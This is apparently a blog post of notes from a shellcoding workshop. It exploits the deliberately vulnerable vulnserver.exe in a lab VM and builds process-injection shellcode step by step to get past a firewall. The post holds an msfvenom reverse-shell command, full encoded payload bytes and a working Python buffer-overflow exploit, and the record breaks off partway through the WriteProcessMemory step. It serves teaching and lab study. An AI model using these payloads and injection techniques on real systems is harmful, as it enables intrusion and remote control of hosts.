Advanced Shellcoding Workshop

Today I attended an advanced shellcoding workshop organized by Div0 and taught by Arnold Anthony. I had previously attended his workshop on buffer overflow basics and custom shellcoding, but I lost my notes, so this time I'm posting them here so I won't lose them again.

A few minutes after the workshop started, the courier came knocking on my door and delivered the @WakeTheCrew espresso coffee concentrate (highly recommended!) that I had ordered 2 days ago. After enjoying a cup of cold brew coffee, I was ready to start hacking!

Arnold started by explaining the goal of the workshop. Sometimes during reconnaissance we know that a server is running a vulnerable process, but a firewall protects it, so we cannot get a reverse or bind shell on any other port. In this workshop, he explained how to write shellcode that rebinds a socket to the same port the firewall already allows, so that we can connect to it.

In this workshop, we used a Win7 VM with ASLR disabled on purpose. In the real world we would generally need to bypass ASLR, but that is out of scope for this workshop.

Here are the IP addresses of the VMs I'm using.

  • Win7: 172.16.202.133
  • Kali Linux: 172.16.202.130

Why and when is a rebind socket needed?

First, let's review a situation when a rebind shell is not needed.

In our PoC (proof of concept), a vulnerable server vulnserver.exe was started in the Win7 VM.

I started by port scanning the Win7 machine using nmap in Kali:

nmap -sS 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 10:17 +08
Nmap scan report for 172.16.202.133
Host is up (0.00056s latency).
Not shown: 988 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
9999/tcp  open  abyss     <------ vulnserver.exe
10243/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:73:49:4C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds

I can see a lot of services running; one of them is port 9999, served by our vulnserver.

Here I used msfvenom to create a Windows reverse shell payload, formatted as Python source. A vulnerable process that executes this payload will connect back to my Kali machine on port 4444.

msfvenom -a x86 -platform Windows -p windows/shell_reverse_tcp lhost=172.16.202.130 lport=4444 -e x86/shikata_ga_nai -b "\x00" -f python

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"

I pasted the generated payload into my Python script exp.py, where 0x625011af is the address of a "JMP ESP" instruction. Arnold said he wouldn't explain how we found this address, since that was covered in the previous Buffer Overflow workshop.

#!/usr/bin/python
import socket
import sys

buf =  b""
buf += b"\xda\xcb\xd9\x74\x24\xf4\x5d\xb8\xd8\xea\xce\x07\x33"
buf += b"\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\x1d\xee\x2c"
buf += b"\xf2\x61\x07\x32\xfd\x99\xd8\x53\x77\x7c\xe9\x53\xe3"
buf += b"\xf5\x5a\x64\x67\x5b\x57\x0f\x25\x4f\xec\x7d\xe2\x60"
buf += b"\x45\xcb\xd4\x4f\x56\x60\x24\xce\xd4\x7b\x79\x30\xe4"
buf += b"\xb3\x8c\x31\x21\xa9\x7d\x63\xfa\xa5\xd0\x93\x8f\xf0"
buf += b"\xe8\x18\xc3\x15\x69\xfd\x94\x14\x58\x50\xae\x4e\x7a"
buf += b"\x53\x63\xfb\x33\x4b\x60\xc6\x8a\xe0\x52\xbc\x0c\x20"
buf += b"\xab\x3d\xa2\x0d\x03\xcc\xba\x4a\xa4\x2f\xc9\xa2\xd6"
buf += b"\xd2\xca\x71\xa4\x08\x5e\x61\x0e\xda\xf8\x4d\xae\x0f"
buf += b"\x9e\x06\xbc\xe4\xd4\x40\xa1\xfb\x39\xfb\xdd\x70\xbc"
buf += b"\x2b\x54\xc2\x9b\xef\x3c\x90\x82\xb6\x98\x77\xba\xa8"
buf += b"\x42\x27\x1e\xa3\x6f\x3c\x13\xee\xe7\xf1\x1e\x10\xf8"
buf += b"\x9d\x29\x63\xca\x02\x82\xeb\x66\xca\x0c\xec\x89\xe1"
buf += b"\xe9\x62\x74\x0a\x0a\xab\xb3\x5e\x5a\xc3\x12\xdf\x31"
buf += b"\x13\x9a\x0a\x95\x43\x34\xe5\x56\x33\xf4\x55\x3f\x59"
buf += b"\xfb\x8a\x5f\x62\xd1\xa2\xca\x99\xb2\x60\x1a\x6b\xc0"
buf += b"\x11\x19\x6b\xd4\xbd\x94\x8d\xbc\x2d\xf1\x06\x29\xd7"
buf += b"\x58\xdc\xc8\x18\x77\x99\xcb\x93\x74\x5e\x85\x53\xf0"
buf += b"\x4c\x72\x94\x4f\x2e\xd5\xab\x65\x46\xb9\x3e\xe2\x96"
buf += b"\xb4\x22\xbd\xc1\x91\x95\xb4\x87\x0f\x8f\x6e\xb5\xcd"
buf += b"\x49\x48\x7d\x0a\xaa\x57\x7c\xdf\x96\x73\x6e\x19\x16"
buf += b"\x38\xda\xf5\x41\x96\xb4\xb3\x3b\x58\x6e\x6a\x97\x32"
buf += b"\xe6\xeb\xdb\x84\x70\xf4\x31\x73\x9c\x45\xec\xc2\xa3"
buf += b"\x6a\x78\xc3\xdc\x96\x18\x2c\x37\x13\x28\x67\x15\x32"
buf += b"\xa1\x2e\xcc\x06\xac\xd0\x3b\x44\xc9\x52\xc9\x35\x2e"
buf += b"\x4a\xb8\x30\x6a\xcc\x51\x49\xe3\xb9\x55\xfe\x04\xe8"

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 10 + buf + "C" * (3000 - len(buf) - 4 - 2003 - 10)  # 0x625011af (JMP ESP), little-endian

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('172.16.202.133', 9999))
        s.send('TRUN /.:/' + shellcode)
        print("Fuzzing with TRUN command with %s bytes" % str(len(shellcode)))
        s.close()
except socket.error:
        print("Error connecting to server")
        sys.exit(1)
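The buffer layout used in the script can be sanity-checked with a small sketch. It only does arithmetic on the numbers from the script (2003 filler bytes, the 4-byte address 0x625011af, 10 NOPs, a 3000-byte total). The helper name build_layout and the 351-byte dummy payload are assumptions for illustration, and the sketch uses Python 3 bytes.

```python
import struct

def build_layout(payload, total=3000, offset=2003, nops=10, ret=0x625011AF):
    """Return filler + return address + NOPs + payload + padding, `total` bytes long."""
    ret_bytes = struct.pack("<I", ret)  # little-endian: af 11 50 62
    padding = total - offset - len(ret_bytes) - nops - len(payload)
    if padding < 0:
        raise ValueError("payload does not fit in the buffer")
    return b"A" * offset + ret_bytes + b"\x90" * nops + payload + b"C" * padding

# Dummy stand-in with the same size msfvenom reported (351 bytes), not a real payload.
dummy = b"\xcc" * 351
layout = build_layout(dummy)
print(len(layout), layout[2003:2007].hex())
```

The point of the check is that the return address lands exactly at offset 2003 and that the padding keeps the total length constant regardless of the payload size.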

So I started a netcat listener in a new console tab in Kali:

nc -lvp 4444

Then I ran the exploit script:

python exp.py

When I checked netcat, I could see a Windows command prompt. This means the Python script connected to the Win7 machine on port 9999 and exploited the server, and the shellcode then opened a reverse shell from a random local port back to my netcat listener on the Kali machine on port 4444:

C:\Users\test\Desktop>netstat -ano | findstr 4444
netstat -ano | findstr 4444
  TCP    172.16.202.133:49175   172.16.202.130:4444    ESTABLISHED     2212

Now imagine a firewall that blocks connections to custom ports like 4444. In that case, there is no way to get the reverse shell to work.

To simulate this scenario, I disabled all the inbound rules in "Windows Firewall" that allowed external hosts to connect to this machine. Then I created a new rule that only allows inbound connections to port 9999.

  • Inbound Rules > Select all > Disable rule
  • Action > New Rule > Port > Specify TCP port 9999 > Allow the connection > Next > Give a name > Finish

Next, I configured the firewall to block all outbound connections from this Win7 VM:

  • Right click on "Windows Firewall with Advanced Security" > Properties > Domain Profile/Private Profile/Public Profile > Outbound connections > Block > OK

Now when I do a port scan, I can confirm that the only exposed port on the Win7 machine is 9999. In the real world, seeing only one or two exposed ports usually suggests that a firewall is involved.

nmap 172.16.202.133
Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-12 11:03 +08
Nmap scan report for 172.16.202.133
Host is up (0.00038s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE
9999/tcp open  abyss
MAC Address: 00:0C:29:73:49:4C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds

If I start netcat and run the Python script again, this time I do not get a shell. Even though the script connected to port 9999 and exploited the server, the firewall blocked the outbound connection to my Kali machine.

So the goal of this workshop is to figure out how we can get a shell even in this situation.


How does a Rebind Socket work?

Overview:

  • Create a suspended cmd.exe process from the shellcode.
  • Allocate memory inside the cmd.exe process.
  • Write the bind shellcode into the allocated memory.
  • Get the EIP register value of the primary thread in the cmd.exe process.
  • Change the EIP value to the address of the allocated memory.
  • Now that EIP points to that memory, resume the thread to execute the bind shell.
  • Terminate vulnserver.exe.

In the rest of the post, I will explain step by step how to do this.


Step 1 - Create a process

Open vulnserver.exe in Immunity Debugger and click the play button to run the application. In the input field at the bottom, type bp 0x625011af to set a breakpoint at the address used in the Python script.

Click the "b" button in Immunity Debugger to check that the breakpoint is in place, then click "c" to return to the main window.

Then I removed the previous shellcode from the Python script and ran it. Execution stopped at the breakpoint ( JMP ESP ).

Then I stepped over the code using F8, or by clicking the down arrow icon (third button after the Play button).

This is where I create a new process using the Windows API CreateProcessA.

According to MSDN, these are the parameters of CreateProcessA:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,
  LPSTR                 lpCommandLine,
  LPSECURITY_ATTRIBUTES lpProcessAttributes,
  LPSECURITY_ATTRIBUTES lpThreadAttributes,
  BOOL                  bInheritHandles,
  DWORD                 dwCreationFlags,
  LPVOID                lpEnvironment,
  LPCSTR                lpCurrentDirectory,
  LPSTARTUPINFOA        lpStartupInfo,
  LPPROCESS_INFORMATION lpProcessInformation
);

I will leave most of these arguments null. Only 4 of them matter here.

lpCommandLine : the command to run as a string, in this case "cmd".

dwCreationFlags : flags that create the process suspended and with no window shown.

lpStartupInfo : points to a structure with 18 members describing the window. They are all left null because we want the process hidden at all times.

lpProcessInformation : points to the most important structure, which receives the handles of the new process. Its hProcess and hThread members are the handles we use later, depending on whether we want to control the process or its primary thread.

Now, I will start building the arguments.

Use any "ASCII to Hex" online tool to convert "cmd" string to hex:

63 6d 64

The string has to be null-terminated, so append 0x00 (null byte) at the end:

63 6d 64 00

x86 is little-endian, so to push the string as a single 4-byte value the bytes are written in reverse order:

00 64 6d 63

However, a null byte is a bad character in this shellcode, so we have to make sure it never shows up in the encoded instructions.

In Immunity Debugger, press the spacebar on a NOP, or double click it, to assemble a new instruction in its place.

There are several ways to avoid bad characters in the shellcode. One method is to load a value that contains no null bytes, then add to or subtract from it to reach the value we want.

In this example I'm using a general purpose register EDX.

MOV EDX,10747d73

Then we will subtract 10101010 from EDX:

SUB EDX,10101010

The value stored in EDX ends up as 0x00646d63 (the hex encoding of "cmd" in ASCII plus the null terminator). Push it to the stack:

PUSH EDX
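The MOV/SUB trick above can be double-checked with a short sketch. It reads "cmd" plus its terminator as one little-endian DWORD and derives the starting value for a given subtrahend, rejecting operands that contain a null byte. The helper name encode_sub is an assumption for illustration; 0x10101010 is the subtrahend used in these notes.

```python
import struct

def encode_sub(target, subtrahend=0x10101010):
    """Return (start, subtrahend) such that start - subtrahend == target (mod 2**32)."""
    start = (target + subtrahend) & 0xFFFFFFFF
    for value in (start, subtrahend):
        # Both immediates end up inside the instruction bytes, so neither may hold 0x00.
        if b"\x00" in struct.pack("<I", value):
            raise ValueError("operand 0x%08x contains a null byte" % value)
    return start, subtrahend

# "cmd" followed by its null terminator, interpreted as a little-endian DWORD.
target = struct.unpack("<I", b"cmd\x00")[0]
start, sub = encode_sub(target)
print(hex(target), hex(start), hex(sub))
```

If a different string produced an operand with a null byte, trying another subtrahend (for example 0x01010101) would be one way around it.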

If I step over, I can see the stack address that stores the "cmd" string in the bottom right pane of Immunity Debugger. Next I copy that address from ESP into another general purpose register such as EBX. This will be used later as the value for lpCommandLine.

MOV EBX,ESP

I can create values for the other arguments on the fly, but let's focus on lpStartupInfo structure next.

Since these are all null, I'll use XOR to create a zero value and save it in a general purpose register such as ECX:

XOR ECX,ECX

The bytes shown on the left side ("33 C9") are the machine code for this instruction. I will push ECX 17 times to zero out the whole lpStartupInfo structure: its 18 members occupy 68 bytes, which is 17 DWORDs.

PUSH ECX
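The count of 17 pushes can be verified from the layout of the 32-bit STARTUPINFOA structure. The sketch below is only a size calculation; the struct format string is my own encoding of the documented field list, not something from the workshop.

```python
import struct

# 32-bit STARTUPINFOA field layout:
#   12 DWORD-sized fields (cb, lpReserved, lpDesktop, lpTitle, dwX, dwY,
#   dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags),
#   2 WORDs (wShowWindow, cbReserved2),
#   4 pointer/handle fields (lpReserved2, hStdInput, hStdOutput, hStdError).
STARTUPINFOA_FORMAT = "<12I2H4I"

field_count = 12 + 2 + 4
size = struct.calcsize(STARTUPINFOA_FORMAT)
pushes = size // 4  # each PUSH ECX writes one 4-byte zero

print(field_count, size, pushes)
```

The two WORD members share a single DWORD, which is why 18 members need only 17 pushes.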

Next I will save the address in the stack frame that points to this lpStartupInfo structure into another register, such as ESI.

MOV ESI,ESP

The value stored in ESI is the memory address of the lpStartupInfo structure, for example something like 0x0194F998.

lpProcessInformation is the other structure needed by CreateProcessA. We could use any writable memory address for it; I'll place it at a 4-byte offset from 0x0194F998, which is 0x0194F99C.

I'll assign this memory address value to EDI:

MOV EDI,ESI
ADD EDI,4

So far:

  • ESI contains the memory address of lpStartupInfo

  • EDI contains the memory address of lpProcessInformation

Push both to the stack:

PUSH EDI
PUSH ESI

The arguments are pushed in reverse order, so the next two (lpCurrentDirectory and lpEnvironment) are both null:

BOOL CreateProcessA(
  LPCSTR                lpApplicationName,    // null
  LPSTR                 lpCommandLine,        // address of the "cmd" string, stored in EBX
  LPSECURITY_ATTRIBUTES lpProcessAttributes,  // null
  LPSECURITY_ATTRIBUTES lpThreadAttributes,   // null
  BOOL                  bInheritHandles,      // null
  DWORD                 dwCreationFlags,      // value 0x08000004, built in ECX
  LPVOID                lpEnvironment,        // null
  LPCSTR                lpCurrentDirectory,   // null
  LPSTARTUPINFOA        lpStartupInfo,        // memory address stored in ESI
  LPPROCESS_INFORMATION lpProcessInformation  // memory address stored in EDI
);

So we push ECX which contains zero value two times:

PUSH ECX
PUSH ECX

Then for dwCreationFlags we need to create the value 0x08000004.

Why this value, you ask? Refer to the Process Creation Flags section in MSDN. This is the sum of two flags that I want the process to be created with:

  • 0x00000004 (CREATE_SUSPENDED): suspended process
  • 0x08000000 (CREATE_NO_WINDOW): no window

0x08000004 contains bad characters because two of its four bytes are null. So I load ECX with a value that has no bad characters, then subtract accordingly to get the value that we want:

MOV ECX,9010105
SUB ECX,1010101
PUSH ECX
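A quick check of the flag arithmetic, as a sketch: it combines the two documented creation flags and confirms that the MOV/SUB operands used above are free of null bytes while the target value is not. The helper name has_null is an assumption for illustration.

```python
CREATE_SUSPENDED = 0x00000004
CREATE_NO_WINDOW = 0x08000000

def has_null(value):
    """True if the 32-bit little-endian encoding of value contains a 0x00 byte."""
    return 0 in value.to_bytes(4, "little")

flags = CREATE_SUSPENDED | CREATE_NO_WINDOW
start, sub = 0x09010105, 0x01010101  # operands of MOV ECX / SUB ECX

print(hex(flags), hex(start - sub), has_null(flags), has_null(start), has_null(sub))
```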

Next I push 3 nulls for the next 3 arguments (bInheritHandles, lpThreadAttributes and lpProcessAttributes).

XOR ECX,ECX
PUSH ECX
PUSH ECX
PUSH ECX

Then push the last 2 values, lpCommandLine (EBX) and lpApplicationName (null), to complete the argument list.

PUSH EBX
PUSH ECX
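Because CreateProcessA uses the stdcall convention, its arguments go onto the stack from last to first. The sketch below just reverses the parameter list to show the push order followed in this step; the value descriptions are taken from these notes, and the helper name push_order is an assumption.

```python
CREATE_PROCESS_ARGS = [
    ("lpApplicationName", "null"),
    ("lpCommandLine", "EBX (address of 'cmd')"),
    ("lpProcessAttributes", "null"),
    ("lpThreadAttributes", "null"),
    ("bInheritHandles", "null"),
    ("dwCreationFlags", "0x08000004"),
    ("lpEnvironment", "null"),
    ("lpCurrentDirectory", "null"),
    ("lpStartupInfo", "ESI"),
    ("lpProcessInformation", "EDI"),
]

def push_order(args):
    """Return the arguments in the order they must be pushed (right to left)."""
    return list(reversed(args))

for name, value in push_order(CREATE_PROCESS_ARGS):
    print("PUSH  %-22s ; %s" % (value, name))
```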

According to MSDN, CreateProcessA is implemented in kernel32.dll. I can get the address of the API using a tool like Arwin.

C:\Users\test\Desktop>arwin kernel32.dll CreateProcessA
arwin - win32 address resolution program - by steve hanna - v.01
CreateProcessA is located at 0x77de2082 in kernel32.dll

Now that we know CreateProcessA lives at 0x77DE2082, I can call this address directly; the function reads its arguments from the stack. (The hard-coded address only stays valid because ASLR is disabled on this VM.)

CALL 77DE2082

Or call it like this. Note that the API name is case sensitive:

CALL kernel32.CreateProcessA

But I prefer to store the memory address of the API in a register before calling it:

MOV EBX,kernel32.CreateProcessA
CALL EBX

The LastErr value ERROR_SUCCESS means the API call succeeded. But how do I check that the process was really created, given that we configured it to stay hidden without opening any window?

I used Process Hacker to see that a new cmd.exe process was created under vulnserver.exe. Right clicking the cmd.exe process shows an option called "Resume", which implies that the process was created suspended, just as intended.


Step 2 - Allocate memory space to the process

The stack now holds the process information structure:

typedef struct _PROCESS_INFORMATION {
  HANDLE hProcess;     // 0x70
  HANDLE hThread;
  DWORD  dwProcessId;
  DWORD  dwThreadId;
} PROCESS_INFORMATION, *PPROCESS_INFORMATION, *LPPROCESS_INFORMATION;

In the stack, we can see that the memory address 0x0174F99C contains the value 00000070, filled in by CreateProcessA. This is the value of hProcess, in other words the process handle, our remote control for the cmd.exe process.

The next step is to allocate memory in the process using the VirtualAllocEx API.

These are the API's parameters:

LPVOID VirtualAllocEx(
  HANDLE hProcess,          // 0x70
  LPVOID lpAddress,         // null
  SIZE_T dwSize,            // 0x01F4
  DWORD  flAllocationType,  // 0x3000
  DWORD  flProtect          // 0x40
);

Here's how I get the values for them:

  • dwSize: around 500 bytes of memory is needed; 500 in decimal is 0x01F4 in hex.
  • flAllocationType: 0x3000. This is the sum of the following:

    • MEM_COMMIT: 0x00001000
    • MEM_RESERVE: 0x00002000
  • flProtect: 0x40 (PAGE_EXECUTE_READWRITE), because we want the memory to be executable, readable, and writable.
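The argument values listed above can be derived in a few lines. This sketch only computes the constants; the dictionary name virtual_alloc_args is an assumption, and the handle value 0x70 is the example from this run.

```python
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x40

virtual_alloc_args = {
    "hProcess": 0x70,                              # example handle seen in the debugger
    "lpAddress": 0,                                # null: let the system pick the address
    "dwSize": 500,                                 # bytes to allocate
    "flAllocationType": MEM_COMMIT | MEM_RESERVE,
    "flProtect": PAGE_EXECUTE_READWRITE,
}

for name, value in virtual_alloc_args.items():
    print("%-17s 0x%04X" % (name, value))
```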

I pop the stack twice to reach the hProcess value 0x70 and load it into ESI.

POP ESI
POP ESI

Next, pop the following value on the stack, hThread, into EDI.

POP EDI

Now I will start building the arguments for VirtualAllocEx, again from last to first. The last argument, flProtect, is 0x40, which is fine to push as is:

PUSH 40

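The next value is 0x3000, but it can't be pushed directly because the encoded instruction would contain null bytes. So I'll build it in ECX like this:

XOR ECX,ECX
MOV CH,30
PUSH ECX

The third argument is dwSize, which is 0x01F4 (500 bytes). ECX still holds 0x3000, so overwriting CH and CL is enough: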

MOV CH,1
MOV CL,0F4
PUSH ECX
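Writing to CH and CL changes only one byte of ECX each, which is what keeps null bytes out of the instruction encoding. A minimal simulation of those partial register writes, with helper names set_ch and set_cl that are assumptions for illustration:

```python
def set_ch(ecx, value):
    """Emulate MOV CH,value: replace bits 8..15 of ECX."""
    return (ecx & 0xFFFF00FF) | ((value & 0xFF) << 8)

def set_cl(ecx, value):
    """Emulate MOV CL,value: replace bits 0..7 of ECX."""
    return (ecx & 0xFFFFFF00) | (value & 0xFF)

ecx = 0                    # XOR ECX,ECX
ecx = set_ch(ecx, 0x30)    # MOV CH,30
alloc_type = ecx           # value of flAllocationType

ecx = set_ch(ecx, 0x01)    # MOV CH,1
ecx = set_cl(ecx, 0xF4)    # MOV CL,0F4
size = ecx                 # value of dwSize

print(hex(alloc_type), hex(size), size)
```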

The next argument, lpAddress, is null:

XOR ECX,ECX
PUSH ECX

The first parameter, hProcess, is pushed last. It is already stored in the ESI register, so I'll push it to the stack:

PUSH ESI

Finally I will call the API:

MOV EBX,kernel32.VirtualAllocEx
CALL EBX

The call returns the address of the allocated memory in the EAX register.

How do we know that memory was allocated to the process?

I can attach a debugger to the process; in this case I'm using Windbg:

  • File > Attach to Process > select cmd.exe

To attach to the correct process, I make sure no other cmd.exe window is open; otherwise, the process ID shown in Process Hacker makes it easy to pick the right one.

The Windbg Memory window shows the allocated memory at address 160000, which confirms that the memory was successfully allocated in the process.

I'll save the start address of the allocated memory somewhere, like in the EBP register.

MOV EBP,EAX

Step 3 - Move the bind shellcode into allocated memory.

The final payload will be a bind shellcode but I'll pop calculator as a PoC for now. Let's generate the shellcode using msfvenom and add it to the Python script:

msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f c

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 949 bytes
unsigned char buf[] = 
"\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab";

I'll add some NOPs (no operation instructions) to separate the rebind shellcode ( payload in the script) from the generated shellcode (our PoC that pops calc), so that they don't risk overwriting each other.

calc_shell=("\xda\xd7\xba\x48\x02\x1f\x0f\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
"\x31\x83\xc7\x04\x31\x57\x14\x03\x57\x5c\xe0\xea\xf3\xb4\x66"
"\x14\x0c\x44\x07\x9c\xe9\x75\x07\xfa\x7a\x25\xb7\x88\x2f\xc9"
"\x3c\xdc\xdb\x5a\x30\xc9\xec\xeb\xff\x2f\xc2\xec\xac\x0c\x45"
"\x6e\xaf\x40\xa5\x4f\x60\x95\xa4\x88\x9d\x54\xf4\x41\xe9\xcb"
"\xe9\xe6\xa7\xd7\x82\xb4\x26\x50\x76\x0c\x48\x71\x29\x07\x13"
"\x51\xcb\xc4\x2f\xd8\xd3\x09\x15\x92\x68\xf9\xe1\x25\xb9\x30"
"\x09\x89\x84\xfd\xf8\xd3\xc1\x39\xe3\xa1\x3b\x3a\x9e\xb1\xff"
"\x41\x44\x37\xe4\xe1\x0f\xef\xc0\x10\xc3\x76\x82\x1e\xa8\xfd"
"\xcc\x02\x2f\xd1\x66\x3e\xa4\xd4\xa8\xb7\xfe\xf2\x6c\x9c\xa5"
"\x9b\x35\x78\x0b\xa3\x26\x23\xf4\x01\x2c\xc9\xe1\x3b\x6f\x87"
"\xf4\xce\x15\xe5\xf7\xd0\x15\x59\x90\xe1\x9e\x36\xe7\xfd\x74"
"\x73\x17\xb4\xd5\xd5\xb0\x11\x8c\x64\xdd\xa1\x7a\xaa\xd8\x21"
"\x8f\x52\x1f\x39\xfa\x57\x5b\xfd\x16\x25\xf4\x68\x19\x9a\xf5"
"\xb8\x7a\x7d\x66\x20\x53\x18\x0e\xc3\xab")

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90"*10 + payload + "C"*(2500-len(payload)-4-2003-10) + "\x90"*100 + calc_shell
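To see where each region of this buffer starts, the offsets can be computed from the same numbers. This is a sketch: the function name region_offsets and the 150-byte payload length are hypothetical, since the real length depends on the assembled rebind shellcode.

```python
def region_offsets(payload_len, first_total=2500, offset=2003, nops=10, gap=100):
    """Return the start offset of every region in the exploit buffer."""
    ret_at = offset                    # 4-byte JMP ESP address
    sled_at = ret_at + 4               # short NOP sled
    payload_at = sled_at + nops        # rebind shellcode
    padding_at = payload_at + payload_len
    if padding_at > first_total:
        raise ValueError("payload too long for the first region")
    gap_at = first_total               # 100 NOPs separating the two shellcodes
    second_at = gap_at + gap           # PoC / bind shellcode
    return {
        "ret": ret_at,
        "nop_sled": sled_at,
        "payload": payload_at,
        "padding": padding_at,
        "nop_gap": gap_at,
        "second_shellcode": second_at,
    }

offsets = region_offsets(payload_len=150)  # 150 is a made-up length
print(offsets)
```

Whatever the payload length, the "C" padding pins the second NOP block at offset 2500, so the second shellcode always starts at 2600.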

To write this shellcode into the allocated memory, I'll use the WriteProcessMemory API.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,                // address on the stack to start copying from; choose one in the NOP area
  SIZE_T  nSize,                   // 500 bytes (0x01F4)
  SIZE_T  *lpNumberOfBytesWritten  // null
);

WriteProcessMemory accepts 5 arguments. In the order they are pushed (last to first):

  • lpNumberOfBytesWritten: null.

  • nSize: how many bytes of memory we're going to write (500 bytes).

  • lpBuffer: the source address we're going to copy from.

  • lpBaseAddress: the start of the memory allocated by VirtualAllocEx.

  • hProcess: the process handle.

For the last argument, give it a null value:

XOR EBX,EBX
PUSH EBX

The next argument, nSize, is 500 (0x01F4):

MOV BH,1
MOV BL,0F4
